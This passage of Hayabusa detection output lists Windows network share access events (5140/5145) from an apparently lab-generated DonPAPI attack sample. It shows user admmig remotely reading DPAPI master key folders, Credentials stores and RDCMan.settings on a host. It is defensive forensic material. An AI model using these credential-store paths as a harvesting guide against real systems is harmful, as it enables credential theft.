0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.977 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.978 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.034 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.037 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 